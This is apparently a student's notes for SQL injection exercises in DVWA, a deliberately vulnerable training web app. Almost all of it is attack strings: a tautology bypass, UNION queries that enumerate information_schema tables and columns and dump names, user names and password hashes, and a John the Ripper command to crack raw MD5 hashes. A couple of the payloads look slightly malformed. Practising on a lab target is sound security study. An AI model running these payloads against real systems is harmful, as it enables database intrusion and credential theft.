SQL Oefeningen in DVWA

---------------------------------------------------------------
SQL injecties 1 --- DVWA ---
---------------------------------------------------------------

	%' or '0'='0
	%' or 0=0 union select null, user() # 
	%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%' # 
	%' and 1=0 union select null, table_name from information_schema.tables where table_name like '%' # 
	&' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' # 
	%' and union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # 
	
	./john --format=raw-MD5 bestandsnaam.txt
	
	
